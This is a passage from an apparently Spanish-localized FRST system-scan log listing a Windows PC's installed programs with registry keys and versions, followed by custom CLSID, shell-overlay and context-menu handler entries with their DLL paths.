Messenger Companion (HKLM-x32\...\{939C80FA-96C9-44A6-B318-8E7D8BD8481B}) (Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
MestReNova LITE 5.2.5-4731 (HKLM-x32\...\MestReNova LITE) (Version: 5.2.5-4731 - Mestrelab Research S.L.)
Microsoft .NET Framework 1.1 (HKLM-x32\...\{CB2F7EDD-9D1F-43C1-90FC-4F52EAE172A1}) (Version: 1.1.4322 - Microsoft)
Microsoft .NET Framework 4 Multi-Targeting Pack (HKLM-x32\...\{CFEF48A8-BFB8-3EAC-8BA5-DE4F8AA267CE}) (Version: 4.0.30319 - Microsoft Corporation)
Microsoft .NET Framework 4.8 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.8.03761 - Microsoft Corporation)
Microsoft ASP.NET MVC 2 - ESN (HKLM-x32\...\{B0DF0057-EF87-471D-A80A-DC1F0463BA19}) (Version: 2.0.50331.0 - Microsoft Corporation)
Microsoft ASP.NET MVC 2 - Visual Studio 2010 Tools - ESN (HKLM-x32\...\{4F19E81D-168E-4E0B-A4B7-AA246FBE3FBB}) (Version: 2.0.50414.0 - Microsoft Corporation)
Microsoft ASP.NET MVC 2 - Visual Studio 2010 Tools (HKLM-x32\...\{40416836-56CC-4C0E-A6AF-5C34BADCE483}) (Version: 2.0.50217.0 - Microsoft Corporation)
Microsoft ASP.NET MVC 2 (HKLM-x32\...\{1803A630-3C38-4D2B-9B9A-0CB37243539C}) (Version: 2.0.50217.0 - Microsoft Corporation)
Microsoft Help Viewer 1.0 (HKLM\...\Microsoft Help Viewer 1.0) (Version: 1.0.30319 - Microsoft Corporation)
Microsoft Office 2007 Service Pack 3 (SP3) (HKLM-x32\...\{90120000-0100-0C0A-0000-0000000FF1CE}_OMUI.es-es_{D79E9128-A250-4155-BE90-2BE81DE0406A}) (Version:  - Microsoft)
Microsoft Office Excel 2007 Help Actualización (KB963678) (HKLM-x32\...\{90120000-0016-0C0A-0000-0000000FF1CE}_OMUI.es-es_{59E09C3D-4878-47D9-87DB-6D0018026889}) (Version:  - Microsoft)
Microsoft Office File Validation Add-In (HKLM-x32\...\{90140000-2005-0000-0000-0000000FF1CE}) (Version: 14.0.5130.5003 - Microsoft Corporation)
Microsoft Office Language Pack 2007 - Spanish/Español (HKLM-x32\...\OMUI.es-es) (Version: 12.0.6612.1000 - Microsoft Corporation)
Microsoft Office Outlook 2007 Help Actualización (KB963677) (HKLM-x32\...\{90120000-001A-0C0A-0000-0000000FF1CE}_OMUI.es-es_{59C244C2-0C37-4E85-8F7E-DBDD3958B694}) (Version:  - Microsoft)
Microsoft Office Outlook Connector (HKLM-x32\...\{95140000-007A-0C0A-0000-0000000FF1CE}) (Version: 14.0.5118.5000 - Microsoft Corporation)
Microsoft Office Powerpoint 2007 Help Actualización (KB963669) (HKLM-x32\...\{90120000-0018-0C0A-0000-0000000FF1CE}_OMUI.es-es_{F318245D-05AE-4681-A749-A036CE44AF29}) (Version:  - Microsoft)
Microsoft Office Professional Plus 2016 (HKLM-x32\...\Office16.PROPLUS) (Version: 16.0.4266.1001 - Microsoft Corporation)
Microsoft Office Word 2007 Help Actualización (KB963665) (HKLM-x32\...\{90120000-001B-0C0A-0000-0000000FF1CE}_OMUI.es-es_{377BA42A-1C84-45D6-94B8-6D00887D172D}) (Version:  - Microsoft)
Microsoft OneDrive (HKU\S-1-5-21-1649130365-987012723-906343211-1000\...\OneDriveSetup.exe) (Version: 17.3.4604.0120 - Microsoft Corporation)
Microsoft Outlook Social Connector Provider for Windows Live Messenger 32-bit (HKLM-x32\...\{95140000-007D-0409-0000-0000000FF1CE}) (Version: 14.0.5120.5000 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.40728.0 - Microsoft Corporation)
Microsoft Silverlight 3 SDK - Español (HKLM-x32\...\{8D8C5BD0-7FC7-4680-B527-218F63920E03}) (Version: 3.0.40818.0 - Microsoft Corporation)
Microsoft SQL Server 2005 (HKLM-x32\...\Microsoft SQL Server 2005) (Version:  - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft SQL Server 2008 (64-bit) (HKLM\...\Microsoft SQL Server 10 Release) (Version:  - Microsoft Corporation)
Microsoft SQL Server 2008 Browser (HKLM-x32\...\{10E05081-646C-4130-A166-83283A3A0A45}) (Version: 10.2.4000.0 - Microsoft Corporation)
Microsoft SQL Server 2008 Native Client (HKLM\...\{12F3060C-64C4-4872-BB3C-4DCBA7877987}) (Version: 10.2.4000.0 - Microsoft Corporation)
Microsoft SQL Server 2008 R2 Data-Tier Application Project (HKLM-x32\...\{F188B6ED-4537-4CAC-A4DE-3BD30E6114C6}) (Version: 10.50.1447.4 - Microsoft Corporation)
Microsoft SQL Server 2008 R2 Transact-SQL Language Service (HKLM-x32\...\{6C239446-F196-44DC-9148-8D912895D097}) (Version: 10.50.1447.4 - Microsoft Corporation)
Microsoft SQL Server Compact 3.5 SP2 ESN (HKLM-x32\...\{2A78694E-ACFE-4D5A-9B0F-C0EBEFA3F280}) (Version: 3.5.8080.0 - Microsoft Corporation)
Microsoft SQL Server Compact 3.5 SP2 x64 ESN (HKLM\...\{24965A31-311D-462D-BAA8-B482ABA115D8}) (Version: 3.5.8080.0 - Microsoft Corporation)
Microsoft SQL Server Database Publishing Wizard 1.4 (HKLM-x32\...\{ACE28263-76A4-4BF5-B6F4-8BD719595969}) (Version: 10.1.2512.8 - Microsoft Corporation)
Microsoft SQL Server Native Client (HKLM\...\{79BF7CB8-1E09-489F-9547-DB3EE8EA3F16}) (Version: 9.00.4035.00 - Microsoft Corporation)
Microsoft SQL Server Setup Support Files (English) (HKLM-x32\...\{53F5C3EE-05ED-4830-994B-50B2F0D50FCE}) (Version: 9.00.4035.00 - Microsoft Corporation)
Microsoft SQL Server System CLR Types (HKLM-x32\...\{46878B08-238C-4F28-9194-9D8604A7F52E}) (Version: 10.50.1447.4 - Microsoft Corporation)
Microsoft SQL Server System CLR Types (x64) (HKLM\...\{CD9B2BA6-F699-4700-81B9-CD28C0BC693C}) (Version: 10.50.1447.4 - Microsoft Corporation)
Microsoft SQL Server VSS Writer (HKLM\...\{DE63A8FE-80A6-4CA3-ACEA-F954B6370596}) (Version: 10.2.4000.0 - Microsoft Corporation)
Microsoft Sync Framework Runtime v1.0 SP1 (x64) es (HKLM\...\{2D6232BE-CDB4-4EE7-AFCB-1541E12041E9}) (Version: 1.0.3010.0 - Microsoft Corporation)
Microsoft Sync Framework SDK v1.0 SP1 es (HKLM-x32\...\{EF948EA2-FA97-4312-BA36-88D76048CCE8}) (Version: 1.0.3010.0 - Microsoft Corporation)
Microsoft Sync Framework Services v1.0 SP1 (x64) es (HKLM\...\{C69733F2-4140-440F-938E-2D47C6CB1C70}) (Version: 1.0.3010.0 - Microsoft Corporation)
Microsoft Sync Services for ADO.NET v2.0 SP1 (x64) es (HKLM\...\{1C3998E1-8501-455C-B829-5031520EBC94}) (Version: 2.0.3010.0 - Microsoft Corporation)
Microsoft Visio Professional 2016 (HKLM-x32\...\Office16.VISPRO) (Version: 16.0.4266.1001 - Microsoft Corporation)
Microsoft Visual C++ 2005 ATL Update kb973923 - x64 8.0.50727.4053 (HKLM\...\{B6E3757B-5E77-3915-866A-CCFC4B8D194C}) (Version: 8.0.50727.4053 - Microsoft Corporation)
Microsoft Visual C++ 2005 ATL Update kb973923 - x86 8.0.50727.4053 (HKLM-x32\...\{770657D0-A123-3C07-8E44-1C83EC895118}) (Version: 8.0.50727.4053 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 ATL Update kb973924 - x64 9.0.30729.4148 (HKLM\...\{EE936C7A-EA40-31D5-9B65-8E3E089C3828}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Designtime - 10.0.30319 (HKLM\...\{61B42D05-EBFA-3896-A267-B71CD3025BC5}) (Version: 10.0.30319 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Runtime - 10.0.30319 (HKLM\...\{94D70749-4281-39AC-AD90-B56A0E0A402E}) (Version: 10.0.30319 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Runtime - 10.0.30319 (HKLM-x32\...\{6A86554B-8928-30E4-A53C-D7337689134D}) (Version: 10.0.30319 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24212 (HKLM-x32\...\{323dad84-0974-4d90-a1c1-e006c7fdbb7d}) (Version: 14.0.24212.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24123 (HKLM-x32\...\{206898cc-4b41-4d98-ac28-9f9ae57f91fe}) (Version: 14.0.24123.0 - Microsoft Corporation)
Microsoft Visual F# 2.0 Runtime (HKLM-x32\...\{729A3000-BC8A-3B74-BA5D-5068FE12D70C}) (Version: 10.0.30319 - Microsoft Corporation)
Microsoft Visual Studio 2010 ADO.NET Entity Framework Tools (HKLM-x32\...\{817C2DCF-4DD7-3C32-8A8E-7CEFF137E543}) (Version: 10.0.30319 - Microsoft Corporation)
Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.50903 - Microsoft Corporation)
Microsoft Visual Studio Macro Tools - ESN Language Pack (HKLM-x32\...\Microsoft Visual Studio Macro Tools - ESN Language Pack) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual Studio Macro Tools (HKLM-x32\...\Microsoft Visual Studio Macro Tools) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Works (HKLM-x32\...\{38BB21D5-B0D1-41DA-A0B0-1EFB5EF4AAC2}) (Version: 9.7.0621 - Microsoft Corporation)
Modelo de objetos de Microsoft Team Foundation Server 2010 - ESN (HKLM\...\Microsoft Team Foundation Server 2010 Object Model - ESN) (Version: 10.0.30319 - Microsoft Corporation)
Movavi Video Converter 19 Premium (HKU\S-1-5-21-1649130365-987012723-906343211-1000\...\Movavi Video Converter 19 Premium) (Version: 19.3.0 - Movavi)
Mozilla Firefox 74.0 (x64 es-MX) (HKLM\...\Mozilla Firefox 74.0 (x64 es-MX)) (Version: 74.0 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 74.0.0.7373 - Mozilla)
MSXML 4.0 SP2 (KB954430) (HKLM-x32\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM-x32\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
MyWinLocker (HKLM-x32\...\{68301905-2DEA-41CE-A4D4-E8B443B099BA}) (Version: 3.1.76.0 - Egis Technology Inc.)
MZ-Tools 3.0 para VBA (HKLM-x32\...\{2B69AD59-FA30-47fc-B950-FA27E7D16A73}_is1) (Version:  - MZTools Software)
NeoDownloader 2.8 (HKLM-x32\...\{E76CDDCE-EFC0-4FE5-9972-9489CE49AA55}_is1) (Version: 2.7 - Neowise Software)
Nero 12 (HKLM-x32\...\{560FC78C-A4B2-461D-9B47-820C1EEF87B8}) (Version: 12.0.02000 - Nero AG)
NetLimiter 3 (HKLM\...\{913923AB-3AAB-4870-8910-627C4CD82789}) (Version: 3.0.0.11 - Locktime Software s.r.o.)
Notepad++ (HKLM-x32\...\Notepad++) (Version: 6.5.5 - Notepad++ Team)
NTI Backup Now 5 (HKLM-x32\...\InstallShield_{12EFA1A4-AC3B-443C-8143-237EDE760403}) (Version: 5.1.2.627 - NewTech Infosystems)
NTI Backup Now Standard (HKLM-x32\...\{12EFA1A4-AC3B-443C-8143-237EDE760403}) (Version: 5.1.2.627 - NewTech Infosystems) Hidden
NTI Media Maker 8 (HKLM-x32\...\{2413930C-8309-47A6-BC61-5EF27A4222BC}) (Version: 8.0.12.6623 - NewTech Infosystems) Hidden
NTI Media Maker 8 (HKLM-x32\...\InstallShield_{2413930C-8309-47A6-BC61-5EF27A4222BC}) (Version: 8.0.12.6623 - NewTech Infosystems)
Nuance PDF Converter Professional 7 (HKLM\...\{F8001A0F-C0E6-4593-88AB-F2FB726C274E}) (Version: 7.10.6403 - Nuance Communications, Inc)
Objetos de administración de Microsoft SQL Server 2008 R2 (HKLM-x32\...\{6438BDAD-CE12-4D38-B1C4-42F94F08408F}) (Version: 10.50.1447.4 - Microsoft Corporation)
Objetos de administración de Microsoft SQL Server 2008 R2 (x64) (HKLM\...\{2040D407-91F5-48F3-9A81-B084573D0577}) (Version: 10.50.1447.4 - Microsoft Corporation)
Optical Drive Power Management (HKLM-x32\...\{AE09C972-EEB2-4DA5-8090-0FCF54576854}) (Version: 1.01.3002 - Acer Incorporated)
Origin8 (HKLM-x32\...\{D7452A01-9BF9-4FFD-8B2E-650F713AE099}) (Version: 8.00.000 - OriginLab) Hidden
OriginPro 8 (HKLM-x32\...\{A912021A-FEDD-4DA3-8DB4-245EBDA84778}) (Version: 8.00.000 - OriginLab Corporation)
Paint.NET v3.5.11 (HKLM\...\{72EF03F5-0507-4861-9A44-D99FD4C41418}) (Version: 3.61.0 - dotPDN LLC)
Paquete de controladores de Windows - eMPIA Technology Inc, (etAudio) MEDIA  (01/09/2007 2.7.0109.0) (HKLM\...\1849833E0162CE51DBEADAF36FE5A044F926B2FE) (Version: 01/09/2007 2.7.0109.0 - eMPIA Technology Inc,)
Paquete de idioma de Microsoft Visual F# 2.0 Runtime - ESN (HKLM-x32\...\{7CCA8BD3-005C-3195-806B-501E6D3D242B}) (Version: 10.0.30319 - Microsoft Corporation)
Paquete de idioma de Microsoft Visual Studio 2010 Tools para Office Runtime (x64) - ESN (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64) Language Pack - ESN) (Version: 10.0.50903 - Microsoft Corporation)
Paquete de idioma del Visor de Ayuda de Microsoft 3.0 - ESN (HKLM\...\Microsoft Help Viewer 1.0 Language Pack - ESN) (Version: 1.0.30319 - Microsoft Corporation)
PDF Password Remover v3.1 (HKLM-x32\...\PDF Password Remover v3.1_is1) (Version:  - VeryPDF.com Inc)
Picture Merge Genius 2.8 (HKLM-x32\...\Picture Merge Genius_is1) (Version:  - EasyTools,Inc)
Polymath 6.0 (HKLM-x32\...\{95730541-F084-4B2D-92A0-0270E18EA29E}) (Version: 6.00.0204.7 - Polymath Software)
PowerISO (HKLM-x32\...\PowerISO) (Version:  - )
Prerequisite installer (HKLM-x32\...\{3AAB08A3-F129-4BD5-B409-AE674F93759D}) (Version: 12.0.0002 - Nero AG) Hidden
Progress Telerik Fiddler (HKU\S-1-5-21-1649130365-987012723-906343211-1000\...\Fiddler2) (Version: 5.0.20182.28034 - Telerik)
Proxy Finder (HKLM-x32\...\Proxy Finder) (Version:  - )
Python 2.5 (HKLM-x32\...\{0A2C5854-557E-48C8-835A-3B9F074BDCAA}) (Version: 2.5.150 - Martin v. Löwis)
QuickTime (HKLM-x32\...\{7BE15435-2D3E-4B58-867F-9C75BED0208C}) (Version: 7.71.80.42 - Apple Inc.)
Raptor 3 (HKLM-x32\...\Raptor_is1) (Version:  - madmax)
RAR Password Unlocker 4.2.0.0 (HKLM-x32\...\{B789FA51-6A71-408F-92DE-EDE4A517B8F9}_is1) (Version:  - Password Unlocker Studio)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.5911 - Realtek Semiconductor Corp.)
Realtek USB 2.0 Card Reader (HKLM-x32\...\{96AE7E41-E34E-47D0-AC07-1091A8127911}) (Version: 6.1.7100.30093 - Realtek Semiconductor Corp.)
Revisores de Texto do Microsoft Office 2016 – Português (Brasil) (HKLM-x32\...\{90160000-001F-0416-0000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Revo Uninstaller 2.1.1 (HKLM\...\{A28DBDA2-3CC7-4ADC-8BFE-66D7743C6C97}_is1) (Version: 2.1.1 - VS Revo Group, Ltd.)
RonyaSoft CD DVD Label Maker 3.02 (HKLM-x32\...\RonyaSoft CD DVD Label Maker) (Version: 3.02 - RonyaSoft)
Samsung Auto Backup (HKLM-x32\...\{821D6F49-1B20-4809-8C73-286CFC52B1B1}) (Version: 4.1.371.0 - Clarus)
Samsung SecretZone (HKLM-x32\...\{66491E5A-7899-4863-A2E9-057E10BCB578}) (Version: 1.00.0000 - Clarus)
Scansoft PDF Professional (HKLM-x32\...\{068724F8-D8BE-4B43-8DDD-B9FE9E49FD76}) (Version:  - ) Hidden
Scientific WorkPlace 4.0 (HKLM-x32\...\{3FDA5DE5-5606-11D5-821A-00104BD1670F}) (Version:  - )
Service Pack 2 para SQL Server 2008 (KB2285068) (64-bit) (HKLM\...\KB2285068) (Version: 10.2.4000.0 - Microsoft Corporation)
Shape Collage (HKLM-x32\...\ShapeCollage) (Version:  - Vincent Cheung)
Smilebox (HKU\S-1-5-21-1649130365-987012723-906343211-1000\...\Smilebox) (Version: 1.0.0.31741 - Smilebox, Inc.)
SpeechRedist (HKLM-x32\...\{8795CBED-55E2-4693-9F14-84EC446935BE}) (Version: 1.0.0 - Epic Games Inc.)
Sql Server Customer Experience Improvement Program (HKLM\...\{2F14965D-567B-4E59-ADEB-0A2CC1E3ADDF}) (Version: 10.2.4000.0 - Microsoft Corporation) Hidden
STATISTICA CambridgeSoft Integration (HKLM-x32\...\{A1E1083D-249D-483C-AD92-CDCFA230A4C7}) (Version: 1.00.0000 - StatSoft, Inc.)
swMSM (HKLM-x32\...\{612C34C7-5E90-47D8-9B5C-0F717DD82726}) (Version: 12.0.0.1 - Adobe Systems, Inc) Hidden
Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 13.2.2.0 - Synaptics Incorporated)
TeamViewer 13 (HKLM-x32\...\TeamViewer) (Version: 13.2.36215 - TeamViewer)
Technitium MAC Address Changer v6.0 (HKLM-x32\...\TMACv6.0) (Version: 6.0 - Technitium)
ThermoSolver 1.0 (HKLM-x32\...\ThermoSolver 1.0_is1) (Version:  - )
Thumbnail me 3.0 Beta (HKU\S-1-5-21-1649130365-987012723-906343211-1000\...\Thumbnail me 3.0 Beta) (Version:  - )
Ulead VideoStudio SE DVD (HKLM-x32\...\{8F8D9297-FDD2-405A-97E7-E52C7B2F97B3}) (Version: 10.0 - Ulead Systems)
Update for Skype for Business 2016 (KB4018367) 32-Bit Edition (HKLM-x32\...\{90160000-0011-0000-0000-0000000FF1CE}_Office16.PROPLUS_{90CFEDAB-40F6-483A-9449-D22B47B1C728}) (Version:  - Microsoft)
Update for Skype for Business 2016 (KB4018367) 32-Bit Edition (HKLM-x32\...\{90160000-002A-0000-1000-0000000FF1CE}_Office16.PROPLUS_{90CFEDAB-40F6-483A-9449-D22B47B1C728}) (Version:  - Microsoft)
Update for Skype for Business 2016 (KB4018367) 32-Bit Edition (HKLM-x32\...\{90160000-002A-0000-1000-0000000FF1CE}_Office16.VISPRO_{90CFEDAB-40F6-483A-9449-D22B47B1C728}) (Version:  - Microsoft)
Update for Skype for Business 2016 (KB4018367) 32-Bit Edition (HKLM-x32\...\{90160000-012B-0C0A-0000-0000000FF1CE}_Office16.PROPLUS_{90CFEDAB-40F6-483A-9449-D22B47B1C728}) (Version:  - Microsoft)
USB2.0 ATV (HKLM-x32\...\{3C873221-12B9-475D-8DCB-62D0B2179AF9}) (Version: 6.10.000.001 - Regulus)
VB 2010 SBS (HKLM-x32\...\{0C133A44-18C5-406B-9A6B-1E696CCDF809}) (Version: 2.00.11 - Microsoft Press)
VBA (2720) (HKLM-x32\...\{FC45B592-2DE6-11D3-A113-00805FEAD43C}) (Version: 6.01.00.1234 - Microsoft Corporation) Hidden
VidLord (HKLM-x32\...\{B85316D9-534F-4F79-927B-9D990762DC2C}) (Version: 6.0.0 - Knight Consulting)
Visual Basic for Applications (HKLM-x32\...\VBA) (Version:  - )
Visual C++ Runtime for Dragon NaturallySpeaking 64bit (x64) (HKLM\...\{4A5A427F-BA39-4BF0-9A47-7777FBE60C9F}) (Version: 10.00.800.228 - Nuance Communications Inc.)
Visual Studio 2010 Prerequisites - English (HKLM\...\{95480F46-25D7-31D1-ACD2-D8722B133A0C}) (Version: 10.0.30319 - Microsoft Corporation)
Visual Studio 2010 Tools for SQL Server Compact 3.5 SP2 ESN (HKLM-x32\...\{CF72A524-84BD-4AB7-B3C6-2C358672CD15}) (Version: 4.0.8080.0 - Microsoft Corporation)
VLC media player (HKLM-x32\...\VLC media player) (Version: 3.0.6 - VideoLAN)
Web Deployment Tool (HKLM\...\{0F37D969-1260-419E-B308-EF7D29ABDE20}) (Version: 1.1.0618 - Microsoft Corporation)
Welcome App (Start-up experience) (HKLM-x32\...\{828175FA-7307-4DBF-95AD-9CEE086B6F45}) (Version: 12.0.14000 - Nero AG) Hidden
Welcome Center (HKLM-x32\...\Acer Welcome Center) (Version: 1.00.3008 - Acer Incorporated)
WinAVI All in One Converter (HKLM-x32\...\WinAVI All in One Converter) (Version: 1.6.0.4147 - ZJMedia Digital Technology Ltd.)
WinAVI Video Converter 9.0 (HKLM-x32\...\WinAVI Video Converter 9.09.0) (Version: 9.0 - WinAVI Video Converter 9.0)
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 15.4.3555.0308 - Microsoft Corporation)
Windows Live Sync (HKLM-x32\...\{953D4586-9A16-495E-BA1F-EE5AA66604DB}) (Version: 14.0.8089.726 - Microsoft Corporation)
Windows Media Player Firefox Plugin (HKLM-x32\...\{69FDFBB6-351D-4B8C-89D8-867DC9D0A2A4}) (Version: 1.0.0.8 - Microsoft Corp)
WinRAR 5.21 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.21.0 - win.rar GmbH)
Wondershare Filmora(Build 8.7.0) (HKLM\...\Wondershare Filmora_is1) (Version:  - Wondershare Software)
Wondershare Helper Compact 2.6.0 (HKLM-x32\...\{5363CE84-5F09-48A1-8B6C-6BB590FFEDF2}_is1) (Version: 2.6.0 - Wondershare)
XML Copy Editor version 1.2.1.2 (HKLM\...\XML Copy Editor_is1) (Version: 1.2.1.2 - Zane U. Ji)

==================== Personalizado CLSID (Lista blanca): ==============

(Si una entrada es incluida en el fixlist, será eliminada del registro. El archivo no se moverá a menos que sea añadido al listado por separado.)

CustomCLSID: HKU\S-1-5-21-1649130365-987012723-906343211-1000_Classes\CLSID\{00020420-0000-0000-C000-000000000046}\InprocServer32 -> C:\Windows\system32\oleaut32.dll (Microsoft Windows -> Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-1649130365-987012723-906343211-1000_Classes\CLSID\{00020421-0000-0000-C000-000000000046}\InprocServer32 -> C:\Windows\system32\oleaut32.dll (Microsoft Windows -> Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-1649130365-987012723-906343211-1000_Classes\CLSID\{00020422-0000-0000-C000-000000000046}\InprocServer32 -> C:\Windows\system32\oleaut32.dll (Microsoft Windows -> Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-1649130365-987012723-906343211-1000_Classes\CLSID\{00020423-0000-0000-C000-000000000046}\InprocServer32 -> C:\Windows\system32\oleaut32.dll (Microsoft Windows -> Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-1649130365-987012723-906343211-1000_Classes\CLSID\{00020424-0000-0000-C000-000000000046}\InprocServer32 -> C:\Windows\system32\oleaut32.dll (Microsoft Windows -> Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-1649130365-987012723-906343211-1000_Classes\CLSID\{00020425-0000-0000-C000-000000000046}\InprocServer32 -> C:\Windows\system32\oleaut32.dll (Microsoft Windows -> Microsoft Corporation)
SSODL: WebCheck - {E6FB5E20-DE35-11CF-9C87-00AA005127ED} - C:\Windows\system32\webcheck.dll (Microsoft Windows -> Microsoft Corporation)
SSODL-x32: WebCheck - {E6FB5E20-DE35-11CF-9C87-00AA005127ED} - C:\Windows\SysWow64\webcheck.dll (Microsoft Windows -> Microsoft Corporation)
ShellIconOverlayIdentifiers: [			IDM Shell Extension] -> {CDC95B92-E27C-4745-A8C5-64A52A78855D} => C:\Program Files (x86)\Internet Download Manager\IDMShellExt64.dll [2019-05-02] (Tonec Inc. -> Tonec Inc.)
ShellIconOverlayIdentifiers: [egisPSDP] -> {30A0A3F6-38AC-4C53-BB8B-0D95238E25BA} => C:\Program Files (x86)\EgisTec\MyWinLocker 3\x64\psdprotect.dll [2009-09-10] (EGIS TECHNOLOGY INC. -> Egis Technology Inc.)
ShellIconOverlayIdentifiers-x32: [egisPSDP] -> {30A0A3F6-38AC-4C53-BB8B-0D95238E25BA} => C:\Program Files (x86)\EgisTec\MyWinLocker 3\x64\psdprotect.dll [2009-09-10] (EGIS TECHNOLOGY INC. -> Egis Technology Inc.)
ContextMenuHandlers1: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2010-11-18] (Igor Pavlov) [Archivo no firmado]
ContextMenuHandlers1: [Advanced SystemCare] -> {2803063F-4B8D-4dc6-8874-D1802487FE2D} =>  -> Ningún archivo
ContextMenuHandlers1: [AimersoftVideoConverterFileOpreation] -> {1AACB93E-AA97-47F1-BD02-8D2AF2815436} => C:\Windows\SysWOW64\AiCM64.dll [2013-08-23] () [Archivo no firmado]
ContextMenuHandlers1: [ANotepad++64] -> {B298D29A-A6ED-11DE-BA8C-A68E55D89593} => C:\Program Files (x86)\Notepad++\NppShell_05.dll [2012-06-18] () [Archivo no firmado]
ContextMenuHandlers1: [Cover Designer] -> {73FCA462-9BD5-4065-A73F-A8E5F6904EF7} =>  -> Ningún archivo
ContextMenuHandlers1: [EDPShell] -> {58549232-7081-4541-882C-767DB238453C} => C:\Program Files\ExamDiff Pro\EDPShell.dll [2016-03-25] (PrestoSoft -> PrestoSoft LLC) [Archivo no firmado]
ContextMenuHandlers1: [EDSshellExt] -> {29FF7AB0-BE34-4992-A30B-53A9D86EE239} => C:\Program Files (x86)\EgisTec\MyWinLocker 3\x64\mwlshellext.dll [2009-09-10] (EGIS TECHNOLOGY INC. -> Egis Technology Inc.)
ContextMenuHandlers1: [PDFC7.ShellExtension] -> {877327F4-8A93-4320-932C-338069C27BEA} => C:\Program Files (x86)\Nuance\PDF Professional 7\ShellExt70.dll [2011-04-28] (Nuance Communications, Inc. -> Nuance Communications, Inc.)
ContextMenuHandlers1: [PowerISO] -> {967B2D40-8B7D-4127-9049-61EA0C2C6DCE} => C:\Program Files (x86)\PowerISO\PWRISOSH.DLL [2009-07-26] (PowerISO Computing, Inc.) [Archivo no firmado]
